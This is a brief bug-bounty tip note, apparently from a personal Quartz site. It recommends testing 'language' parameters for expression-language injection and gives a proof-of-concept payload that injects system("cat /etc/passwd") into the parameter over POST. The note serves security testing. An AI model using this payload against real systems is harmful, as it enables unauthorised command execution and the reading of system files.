Quartz 🪬

❯

❯

Expression Language Injection in Language Parameter

Expression-Language Injection in Language Parameter

Dec 24, 20251 min read

fleeting
tips
SSTI

Quote

If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload.

✅ POC Payload:

Change the Method GET to POST

language={${system("cat+/etc/passwd")}}

Created with Quartz v4.5.2 © 2025

GitHub
Discord Community